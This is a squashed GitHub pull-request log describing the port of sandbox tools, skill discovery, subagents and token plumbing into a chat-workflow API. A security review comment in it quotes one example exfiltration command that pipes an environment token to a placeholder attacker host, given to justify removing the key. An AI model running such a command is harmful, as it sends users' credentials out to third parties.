* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence. Adds a
messageMetadata callback to runAgentStep's toUIMessageStream call so
the UI receives {modelId, lastStepUsage, totalMessageUsage,
lastStepCost, totalMessageCost, stepFinishReasons} on every assistant
turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte
so sandbox.recoupable.com's model/cost badges keep working when cut
over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of
  open-agents' gateway-metadata.ts, parses gateway-reported per-step
  cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of
  open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring
  open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts —
  stateful factory returning a fresh callback per turn; accumulates
  usage + cost across finish-step parts.

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called
this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt
the user's preferred path of upgrading api's `ai` package rather than
maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by
  extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located
  in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai,
  @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level
`inputTokens` number + nested `inputTokenDetails`) — identical to
open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage
  directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages
  (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594)

Convert taskTool.execute from `async () =>` to `async function*`,
mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple
chunks during the subagent run so the chat UI can render:

  - An initial "Subagent · 0 tools · 0 tokens" card with stable
    startedAt timestamp
  - A live `pending: {name, input}` indicator for each tool-call
  - Accumulated `usage` after each finish-step
  - A final `{final: ModelMessage[], ...}` chunk containing the full
    subagent transcript for expandable rendering

`toModelOutput` mirrors open-agents' implementation: extracts the
last assistant text part from `output.final` for inclusion in the
parent agent's context.

New (SRP, one function per file):
- lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps
  addLanguageModelUsage to handle undefined inputs without
  introducing zero-tokens placeholders.

Drive-by fix: askUserQuestionTool's `toModelOutput` signature was
`(output) =>` from the older beta SDK era. The current SDK
(ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to
`({ output }) =>` so the function actually receives the user's
answers at runtime — was previously falling through to the generic
"User responded to questions." path. Tests updated to match.

Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9
askUserQuestion); full suite 3114/3114 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597)

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7)

Third open-agents → api cutover bundle. The handler hardcoded
`workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set
`currentBranch`, so the agent had no environment info in its system
prompt and had to run `pwd` / `git branch` on every turn.

Production verification (today, before this fix):
  agent: "My system prompt does not contain working directory or
         branch information."

After this fix the agent receives an Environment section + Current
branch line + cloud-sandbox checkpointing block — same shape as
open-agents (sandbox.recoupable.com) emits.

Changes:
- New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles
  environment section → Current branch → cloud-sandbox checkpointing
  → custom instructions, all conditional on inputs. Mirrors
  open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts).
- New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports
  open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}`
  placeholder substitution.
- `handleChatWorkflowStream`: connect the sandbox once for both skill
  discovery AND cwd/branch reading, then thread real values into
  `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On
  connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves
  today's behavior; tools surface real errors later when they
  reconnect).
- `runAgentStep`: build the system prompt via
  `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})`
  instead of using the static `agentCustomInstructions` directly.

Scope reduced from the original "A.7+9" bundle: dropped contextLimit
plumbing because it's a client-side display concern in open-agents,
not server-side model routing (verified via grep — open-agents'
server never reads context.contextLimit either).

Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring);
full suite 3121/3121 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore(chat-workflow): drop currentBranch handling from system prompt

Per direction: branch is always `main` (the default branch) in api's
deployment topology, so the per-branch `Current branch: <name>` line
and cloud-sandbox checkpointing block don't add information today.
Strip the templating to keep the system prompt focused on what's
load-bearing (the Environment section indicating workspace-relative
paths).

- Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of
  open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real
  per-session branch)
- Drop `currentBranch` from `buildAgentSystemPrompt` options +
  rendering
- Stop reading `sandbox.currentBranch` in handleChatWorkflowStream
  (the field stays on AgentContext.sandbox for type completeness;
  also consumed by createSandboxHandler unchanged)
- Remove branch-related test cases

Can be re-added later if/when meaningful per-session branches (e.g.
xx/abcdef12 generated branches) land.

Tests: 3119/3119 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call

Build failure on bf1e245 — runAgentStep was still passing
`currentBranch: input.agentContext.sandbox.currentBranch` after
buildAgentSystemPrompt's option was removed. Stripping it.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): Anthropic prompt cache control (Bundle A.6) (#599)

Fourth open-agents → api cutover bundle. runAgentStep was sending the
same system prompt + tool definitions on every turn as fresh input,
even though Anthropic prompt caching can shave 90% off subsequent
input cost. Production traces showed `cacheReadTokens: 0` on every
api turn, while open-agents shows cacheRead matching cacheWrite from
the prior turn — i.e. open-agents reuses the cached prefix.

Changes (SRP — one function per file):
- `lib/agent/contextManagement/isAnthropicModel.ts` — predicate
  port of open-agents'
  `packages/agent/context-management/cache-control.ts:5`.
- `lib/agent/contextManagement/addCacheControlToTools.ts` — marks
  the LAST tool with `cacheControl: { type: "ephemeral" }`. Last-only
  conserves Anthropic's 4-breakpoint limit.
- `lib/agent/contextManagement/addCacheControlToMessages.ts` —
  marks the LAST message with `cacheControl` on every step, per
  Anthropic's "mark the final block of the final message" guidance.

`runAgentStep` now:
- Wraps the tool set via `addCacheControlToTools(...)` before passing
  to streamText (static — set once per step).
- Adds a `prepareStep` callback that wraps `messages` via
  `addCacheControlToMessages(...)` on every internal model call.

Production behavior reproducer (Haiku 4.5, identical 2-turn prompt
to both backends):
  api prod (broken): turn1 cacheWrite=0 cacheRead=0 cost=$0.005952
                     turn2 cacheWrite=0 cacheRead=0 cost=$0.005959
                     → flat cost; full input billed every turn.
  open-agents prod:  turn1 cacheWrite=10966 cacheRead=0
                     turn2 cacheWrite=12    cacheRead=10966 cost drops 12x
                     → near-full prefix re-read from cache on turn 2.

After this PR, api should match open-agents' caching curve.

Tests: 19 new (7 isAnthropicModel + 5 addCacheControlToTools + 5
addCacheControlToMessages + 2 runAgentStep wiring assertions); full
suite 3138/3138 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): forward Privy JWT as RECOUP_ACCESS_TOKEN (Bundle A.4) (#601)

Fifth and final open-agents → api cutover bundle. The chat UI sends a
short-lived Privy JWT in the workflow request body as
`recoupAccessToken`. Today api silently strips it via Zod's default
`.strip()` mode and never plumbs it into the sandbox env, so the
`recoup-api` skill's curl examples can't authenticate as the user.

Production reproducer (today, before this fix):
  api prod:        recoup-api skill loads. curl returns
                   "RECOUP_ACCESS_TOKEN is not set" → 401.
                   Agent: "you need to sign in."
  open-agents prod: recoup-api skill loads. curl returns HTTP 200
                   with the user's account_id.

Plumbing (all three layers TDD red → green):
- lib/chat/validateChatWorkflow.ts — accept
  `recoupAccessToken: z.string().min(1).max(8192).optional()` in the
  body schema. Open-agents-shape compatible.
- lib/agent/tools/AgentContext.ts — add `recoupAccessToken?: string`
  field. Mirrors open-agents'
  `packages/agent/types.ts:29`.
- lib/chat/handleChatWorkflowStream.ts — conditionally spread the
  token into `agentContext` when validator surfaced it.
- lib/agent/tools/buildRecoupExecEnv.ts — inject
  `RECOUP_ACCESS_TOKEN` into the sandbox exec env when the field is
  set. The recoup-api skill's curl examples reference this env var.

Security note: only forward the token when the caller sent it in the
body (chat UI path). x-api-key callers don't set this field, so their
long-lived `recoup_sk_…` key is never exfiltratable from the sandbox
env. Maintained from the prior code comment.

Tests: 5 new (3 buildRecoupExecEnv + 1 validator + 1 handler);
plus 1 handler omit-when-undefined assertion. Full suite 3144/3144
pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant